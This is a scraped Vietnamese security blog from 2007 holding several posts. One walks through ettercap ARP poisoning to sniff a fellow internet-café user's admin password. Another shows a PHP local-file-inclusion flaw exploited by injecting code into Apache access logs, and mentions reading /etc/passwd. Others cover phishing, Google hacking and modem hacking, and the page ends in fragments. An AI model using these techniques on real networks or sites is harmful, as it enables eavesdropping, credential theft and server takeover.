Man in the middle attack (Tác giả:Phạm Đức Hải) Trong bài viết này tôi sẽ trả lời cho các bạn câu hỏi : (tính trong cùng LAN thôi, mặc dù kỹ thuật này xưa rồi nhưng vẫn hay lắm) - "Nghe nén" là như thế nào ? - hacker làm thế nào để ăn cắm dữ liệu nhạy cảm của bạn : password,địa chỉ các trang web bạn vào, Định nghĩa : In cryptography, a man-in-the-middle attack (MITM) is an attack in which an attacker is able to read, insert and modify at will, messages between two parties without either party knowing that the link between them has been compromised. The attacker must be able to observe and intercept messages going between the two victims. The MITM attack can work against public- key cryptography and is also particularly applicable to the original Diffie- Hellman key exchange protocol, when used without authentication. Nguồn : http://en.wikipedia.org/wiki/Man-in-the-middle_attack Nói nôm na là hacker sử dụng phương pháp này để “nghe lén” hệ thống mạng và lấy cắp các thông tin nhạy cảm như username (tên đăng nhập), password (mật mã đăng nhập) hay các thông tin quan trọng khác. Chẳng hạn tôi cùng mạng LAN với admin trang www.guru.net.vn, tôi muốn lấy chộm mật khẩu admin trang web này. (Ví dụ một hôm đẹp trời hắn ra hàng net ngồi và vào phần admin, mail, ; tôi cũng ngồi cùng hàng net đó.). Tôi quan tâm xem hắn vào trang web nào ? chat với ai, Vậy làm thế nào để tôi biết điều đó. MITM chính là cái tôi cần làm. Chuẩn bị phần mềm (bài viết này tôi demo trên hệ điều hành Windows): - ettercap (được mệnh danh là Lord Of The TokenRing) để làm arpspoof, dnsspoof - ethereal để bắt các gói tin Sau khi bạn cài hai công cụ trên, mọi thứ đã sẵn sàng. Việc đầu tiên là xác định IP của Victim, cùng LAN nên dễ dàng biết thôi, hơn nữa các hàng net thường đánh số máy. Khởi động ettercap, chọn chế độ Promisc mode Chọn chế độ sniff: Bấn Ctrl+S để scan host cùng mạng, sau đó bấm H để liệt kê các host. Victim có IP là : 192.168.11.32 chẳng hạn. Add IP này vào target, bấm vào start để bắt đầu "lắng nghe". Tiếp theo cần bật Ethereal và chọn card mạng để bắt đầu bắt gói tin. Khi đó các gói tin từ victim thay vì gửi đến đích ngay nó sẽ chuyển đến máy của tôi trước rồi mới chuyển đi. Quá trình này victim sẽ không hề hay biết. Nên phương pháp này gọi là nghe nén. Chuyển lại ettercap, tôi bắt đầu tấn công ARP Poisioning bằng cách chọn trên menu Mitm, và check vào 2 ô của nó. Chọn view connection để biết victim đang làm gì. Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it! Nhập các thuật ngữ tìm kiếm của bạn Nộp mẫu đơn tìm kiếm Tìm ki?m Web guru.net.vn Chuyên mục: Bảo mật | Hack 05 Tháng Mười 2007 @ 09:35 Ý kiến [0] Một vài kiểu lợi dụng của hacker sau khi tấn công (Tác giả:Phạm Đức Hải) Sau khi kiểm soát một site hacker sẽ làm gì ? Câu hỏi này đã được nêu ra khá nhiều trên các diễn đàn bảo mật, trong bài viết này tôi không mong muốn có thể liệt kê tất cả các việc có thể mà hacker có thể làm :deface, drop database, Ở đây tôi sẽ sẽ minh họa một vài trường hợp lợi dụng mà chủ website không hề biết. Lưu ý : tất cả các ví dụ ở đây nhằm mục đích học hỏi, rút kinh nghiệm ngoài ra không có mục đích gì khác. 1. Phát tán mã độc hoặc chuyển đến một trang web chứa mã độc. Trang chủ của website hacker không thay đổi gì Trên google một thời gian thấy xuất hiện cảnh báo "Trang web này có thể gây hại cho máy tính của bạn" Nguyên nhân ở đâu ? View-source trang này sẽ nhìn thấy đoạn code ở phía cuối trang web: Đoạn code trên dẫn đến một trang ngoài trang web và có chứa mã độc, khiến google cảnh báo. Thông thường đoạn mã chèn vào có thể được chèn trực tiếp vào trang web, có thể được chèn vào nội dung tin trong database. 2. Lợi dụng để Phishing Trang chủ vẫn bình thường giống như trong trường hợp trên, khiến admin không hay biết. Mã trang Phishing được đẩy lên và link đến 1 nơi nào đó để Phishing: Đây là trang giả mạo ngân hàng RBC của Canada. Cảnh báo của RSA Anti-Fraud Command Center [mailto:afcc@rsasecurity.com] (còn nữa) Gửi tặng || Bloglines || del.icio.us || Technorati || Digg it! Nhập các thuật ngữ tìm kiếm của bạn Nộp mẫu đơn tìm kiếm Tìm ki?m Web guru.net.vn Chuyên mục: Bảo mật | Hack 11 Tháng Chín 2007 @ 03:09 Ý kiến [0] Combine “local inclusion + HTTP Header + access logging” attack (Tác giả:Phạm Đức Hải) Bài này GuanYu mới gửi, tôi đăng lại ở đây, để các bạn tham khảo, để tìm được server áp dụng bài này hơi khó đây. Về cơ bản kiến thức không có gì mới, điểm sáng tạo là ở cách exploit. / Mục tiêu: Server Mức độ nguy hiểm: khá cao Mức độ phổ biến: có lẽ ko nhiều :-p Người viết: Quan Vân Trường / I ) Sơ lượt: Thông thường các web service thường có thêm chức năng ghi lại “nhật kí truy cập” của người dùng. Chức năng này giúp cho công việc quản lý website của mình trở nên dể dàng hơn. Nhưng từ chức năng này, chỉ cần 1 tí sơ xuất trong việc lập trình, 1 lỗi nhỏ (local inclusion) có thể giúp cho attacker xâm nhập vào website đó. II ) Nói về “local inclusion”: Chú ý: Ở đây chúng ta sẽ lấy ví dụ với Apache, “webroot” là /home/hostings/webs/victim.net/htdocs/ và code lỗi có dạng: [code] <?php … include(“/home/hostings/webs/victim.net/htdocs/web/”.$_GET[‘html’]); … ?> [/code] (Link vd: _http://www.victim.net/index.php?html=xyz.html) Với đọan code lỗi như trên attacker chỉ có thể include được các file nằm trong server mà thôi (giới hạn thì tùy theo trường hợp, cấu hình của server, ở đây lấy ví dụ là có thể cat được /etc/passwd) và attacker có thể khai thác bằng cách đưa file chứa code “độc” (có thể là html, txt, các dạng file ảnh.v.v.) lên server và include chúng. (ở chủ đề này ta ko nói sâu về file inclusion, có thể xem lại bài “PHP file include, phát hiện – khai thác và khắc phục” của QVT trước đây) Nhưng, nếu như atttacker ko được phép đưa bất cứ gì lên website đấy. Họ sẽ làm thế nào ?? Apache (đang nói đến trong ví dụ) sẽ giúp họ thực hiện việc này. III ) Nói về “HTTP Header” và “access logging”: QVT chưa học về những cái này, chỉ biết một request bình thường có dạng: [code] GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705) Host: www.victim.net Referer: www.hvaonline.net Connection: keep-alive [/code] Và “nhật kí” sẽ được ghi lại (đại lọai) như sau: (giả sử tiếp file log nằm tại: /home/hostings/webs/victim.net/logs/access_log – cái này vẫn tùy vào từng trường hợp khác nhau mà tùy biến) [code] 218.56.8.71 - - [01/Aug/2007:05:21:38 +0200] "GET / HTTP/1.1" 200 20507 "www.hvaonline.net" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705) [en]" [/code] Nói đến đây, chắc mọi người đã có thể đóan được attacker sẽ làm gì tiếp theo rồi phải ko ạh. IV ) “Tấn công”: Khi không thể đưa gì lên server (thông qua upload hay đại lọai vậy), thì cơ chế “ghi nhật kí” sẽ trở thành 1 “công cụ” khá hữu ích cho attacker. Attacker sẽ gửi 1 HTTP request đến Apache và thay những thứ “sẽ được ghi vào log” bằng những code “độc” theo ý mình để “excute” nó. [code] GET <?php phpinfo(); ?> HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705) Host: www.victim.net Referer: <?php phpinfo(); ?> Connection: keep-alive [/code] Khi đấy, “nhật kí” sẽ có thêm: [code] 218.56.8.71 - - [01/Aug/2007:05:21:38 +0200] "GET <?php phpinfo(); ?> HTTP/1.1" 200 20507 "<?php phpinfo(); ?>" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705) [en]" [/code] Để thực hiện công việc này, attacker có thể sử dụng web browser, lập trình socket bằng các ngôn ngữ, hay sử dụng “IE HTTP Analyzer”, hoặc “InetCrack” .v.v. rất nhiều cách. Nhưng, làm thế nào để excute code ấy khi nó ko phải là file PHP? Lợi dụng [...]... http://johnny.ihackstuff.com/ghdb.php Hacker có thể làm được gì ? • Tìm ra lỗ hổng của server : lỗi phiên bản, bug, • Các thông tin nhạy cảm do các thông báo "bắn" ra • File chứa mật khẩu • Thư mục nhạy cảm : thư mục chứa code lỗi, • Trang đăng nhập vào hệ thống • Trang chứa thông tin về cấu hình mạng, firewall như log fire walll Kiểm tra hệ thống của bạn và chống Google hacking? Cách đơn giản nhất là tự hack. .. là tự hack site của ta sự dụng GHDB Cách khác là có thể dùng các chương trình quét Khi phát hiện ra chỗ nào có thể khai thác được bạn hãy loại bỏ nó Ví dụ khai thác ? Trong bài viết Lỗi upload file qua các editor tôi cũng đã sử dụng Google Hacking để demo việc khai thác lỗ hổng của các Editor bằng cách tìm ra các site sử dụng các loại editor này Bạn đã biết Google Hacking là gì rồi phải không ? Gửi... mỹ, chat chít đến hơn 1h Xong xuôi quay ra xem tình hình cái mạng mình đang vào xem thế nào ? Lại nhớ gần đây bác Quảng có làm "rùm beng" cái vụ modem này nên tôi quay lại video cách hack gần như kiểu các bác đã thông xem thế nào ? Thực ra cái này thì cũng không có gì mới mẻ với tôi hay bất kỳ bạn nào đã từng tìm hiểu về bảo mật vì đây là cái rất căn bản Còn việc lấy dữ liệu từ máy đó là không đơn... hệ thống luật pháp đối với nhành tin học chưa ổn định, không có tổ chức, cá nhân nào ở VN có thể định hướng tốt cho các hacker tự do Hầu hết những người muốn tìm hiểu về bảo mật đều phải tự học qua các site của nước ngoài Cái an toàn nhất có lẽ là chơi war game để học hỏi và giải trí Trong hội thảo nói trên sẽ có một cuộc thi tương tự war game nhưng sẽ khó hơn nhiều Cái này tôi nghĩ là rất thú vị và... thức hack game nổi tiếng lần đầu đến Việt Nam Điển hình của sự thiếu sân chơi, thiếu định hướng là các vụ việc của dantruongx, huyremy và GuanYu Vào tháng 12 năm 2003, tại thành phố HCM có một đề tài mang tên "ĐỀ TÀI NGHIÊN CỨU ỨNG DỤNG HỖ TRỢ BẢO MẬT HỆ THỐNG THÔNG TIN CHO CÁC MẠNG TIN HỌC VIỆT NAM" Trong đó có một phần là cuộc thi : THI TÌM SƠ HỞ "BUGSEARCH", cuộc thi này như sau : Thân chào các bạn,... DanTruongX Sau này vụ chodientu.com chính là do huyremy gây ra, hàng loạt các vụ DOS là do DanTruongX làm, điển hình là vụ Việt Cơ Còn GuanYu là ai thì các bạn đã quá rõ sau vụ hack site Bộ giáo dục vừa qua GuanYu nhỏ tuổi nhưng kiến thức về tin học khá tốt, năm lớp 9 đã từng tham gia thi tin học trẻ không chuyên toàn quốc Nếu các hacker này được định hướng tốt và có sân chơi thì sẽ không sản ra những... http://www.guru.net.vn/content/binary/wifi_hacked_by_guru_800600.htm Download Flash file: http://www.guru.net.vn/content/binary/wifi_hacked_by_guru.swf http://duchaikhtn.googlepages.com/wifi_hacked_by_guru.swf http://loveha.googlepages.com/wifi_hacked_by_guru.net.vn.swf Gửi tặng || Bloglines || del.icio.us || Technorati || Nhập các thuật ngữ tìm kiếm của bạn đơn tìm kiếm Web Digg it! Nộp mẫu Tìm ki?m guru.net.vn Chuyên mục: Bảo mật | Hack. .. cài thêm các gói : apt-get install libgtk2-ruby libglade2-ruby Như vậy là hoàn tất quá trình cài đặt MS 3 try it ! Gửi tặng || Bloglines || del.icio.us || Technorati || Nhập các thuật ngữ tìm kiếm của bạn đơn tìm kiếm Web Digg it! Nộp mẫu Tìm ki?m guru.net.vn Chuyên mục: Hack | Ubuntu 13 Tháng Bảy 2007 @ 10:45 Ý kiến [2] Google Hacking (Tác giả:Phạm Đức Hải) Google Hacking là gì ? Google Hacking là... qua Gửi tặng || Bloglines || del.icio.us || Technorati || Nhập các thuật ngữ tìm kiếm của bạn đơn tìm kiếm Web Digg it! Nộp mẫu Tìm ki?m guru.net.vn Chuyên mục: Bảo mật | Hack | Tản mạn 21 Tháng Sáu 2007 @ 03:55 Ý kiến [4] Các site bị hack trong tháng 5 (Tác giả:Phạm Đức Hải) Theo Zone-H thì trong tháng 5 Vn có 14 site bị tấn công (do các hacker nước ngoài); trong danh sách này tôi thấy đáng chú ý là... tạo diều kiện cho các bạn quan tâm vấn đề bảo mật hệ thống có được một sân chơi lành mạnh và thử nghiệm khả năng chống lại các cuộc xâm nhập một phương thức cấu hình máy chủ - sau cuộc thi, cấu trúc toàn bộ hệ thống máy chủ bugsearch và các thiết bị bảo vệ khác cùng tất cả các cấu hình của chúng sẽ được công bố công khai và cung cấp miễn phí cho tất cả những ai quan tâm - Hệ thống các dịch vụ của máy . http://en.wikipedia.org/wiki/Man-in-the-middle_attack Nói nôm na là hacker sử dụng phương pháp này để nghe lén” hệ thống mạng và lấy cắp các thông tin nhạy cảm như username (tên đăng nhập), password (mật mã đăng nhập) hay các thông tin quan trọng. dụng. Google Hacking Database : http://johnny.ihackstuff.com/ghdb.php Hacker có thể làm được gì ? • Tìm ra lỗ hổng của server : lỗi phiên bản, bug, • Các thông tin nhạy cảm do các thông báo "bắn". thông tin về cấu hình mạng, firewall như log fire walll Kiểm tra hệ thống của bạn và chống Google hacking? Cách đơn giản nhất là tự hack site của ta sự dụng GHDB. Cách khác là có thể dùng các